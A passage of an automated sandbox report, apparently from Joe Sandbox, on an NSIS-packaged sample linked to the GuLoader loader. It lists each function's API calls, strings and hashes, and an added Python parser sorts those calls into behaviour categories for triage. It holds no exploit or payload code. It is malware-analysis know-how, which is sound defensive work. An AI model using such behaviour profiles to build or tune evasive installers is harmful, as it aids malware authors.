                                                  • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                  • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                  • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                  APIs
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                    • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                    • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                  • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                  • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                  • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405195
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                    • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                  • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C01
                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                  • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                  • CloseHandle.KERNEL32(?), ref: 004056F5
                                                  Strings
                                                  • Error launching installer, xrefs: 004056D6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                  • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
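The function blocks above are easier to triage once the API lines are pulled out of the report layout and grouped per function: the RegCreateKeyExW/RegSetValueExW/RegCloseKey function, the WaitForSingleObject/GetExitCodeProcess function that only reaches CreateProcessW through its subcall at 004056C3, the GetTickCount/GetTempFileNameW function whose string is "nsa", and the CreateProcessW function carrying "Error launching installer" (those last two strings, together with "[Rename]" further down, are the strings the NSIS installer stub uses, which is worth knowing before attributing any of these calls to the GuLoader payload itself). The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin; it takes a constructed excerpt in the report's own block format (copied from the listing above and shortened), parses each function's direct and subcall API entries, Strings entries and Similarity fields, and maps API names onto behaviour buckets of my own choosing. The `BEHAVIORS` table and the `callers_of` pivot are assumptions for illustration, not anything the report defines.

```python
"""Parse Joe Sandbox function blocks (APIs / Strings / Similarity) and summarise behaviour per function."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API entry, e.g. "CreateProcessW.KERNEL32(00000000,?,...), ref: 004056E8",
# optionally prefixed with "Part of subcall function 004056C3: " for calls made by a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# One Strings entry, e.g. "Error launching installer, xrefs: 004056D6"
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})$")
BULLET = "\u2022"
SECTIONS = {"APIs", "Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin"}

# Behaviour buckets for triage (my own mapping, not defined by the report).
BEHAVIORS = {
    "registry-write": {"RegSetValueExW", "RegSetValueExA"},
    "process-create": {"CreateProcessW", "CreateProcessA"},
    "process-wait": {"WaitForSingleObject", "GetExitCodeProcess"},
    "temp-file": {"GetTempFileNameW", "GetTempFileNameA"},
    "dir-create": {"CreateDirectoryW", "CreateDirectoryA"},
}

# Constructed excerpt in the report's block layout (four functions from the listing above, shortened).
SAMPLE = """\
APIs
• RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
• lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
• RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
• RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Memory Dump Source
• Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCreateValuelstrlen
• String ID:
• API String ID: 1356686001-0
• Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
APIs
  • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
  • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
• WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
Similarity
• API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
• String ID:
• Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
APIs
• GetTickCount.KERNEL32 ref: 00405C01
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
Strings
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
• CloseHandle.KERNEL32(?), ref: 004056F5
Strings
• Error launching installer, xrefs: 004056D6
Similarity
• String ID: Error launching installer
• Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    callee: Optional[str]  # address of the sub-function that actually makes the call, if any


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    api_id: str = ""
    string_id: str = ""
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)


def parse_blocks(text):
    """Split report text into FunctionRecords; a record closes at its 'Opcode ID' line."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith(BULLET):
            continue
        item = line[len(BULLET):].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["callee"]))
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                cur.strings.append((m["text"], m["ref"]))
        elif section == "Similarity":
            key, _, value = item.partition(":")
            value = value.strip()
            if key == "API ID":
                cur.api_id = value
            elif key == "String ID":
                cur.string_id = value
            elif key == "Opcode ID":
                cur.opcode_id = value
                records.append(cur)
                cur = FunctionRecord()
    return records


def summarize(records):
    """Per function: direct APIs, behaviours from direct calls, behaviours inherited via subcalls, strings."""
    out = []
    for r in records:
        direct = {c.name for c in r.apis if c.callee is None}
        inherited = {c.name for c in r.apis if c.callee is not None}
        strings = [s for s, _ in r.strings] + ([r.string_id] if r.string_id else [])
        out.append({
            "opcode_id": r.opcode_id[:16],
            "direct_apis": sorted(direct),
            "behaviors": sorted(b for b, names in BEHAVIORS.items() if direct & names),
            "inherited": sorted(b for b, names in BEHAVIORS.items() if inherited & names),
            "strings": list(dict.fromkeys(strings)),
        })
    return out


def callers_of(records, api_name):
    """Pivot: which functions reference an API, and through which subcall (None = direct)."""
    return [(r.opcode_id[:16], c.callee) for r in records for c in r.apis if c.name == api_name]


if __name__ == "__main__":
    recs = parse_blocks(SAMPLE)
    for row in summarize(recs):
        print(row)
    print("CreateProcessW callers:", callers_of(recs, "CreateProcessW"))
```

Run it against the full report text instead of `SAMPLE` to get one row per function; the `inherited` column is what separates the launcher wrapper (process-wait, CreateProcessW only via 004056C3) from the function that really calls CreateProcessW.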
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                  • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                  • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                  • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                  • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                  • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                  • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                  • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                  • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                  • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                  • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9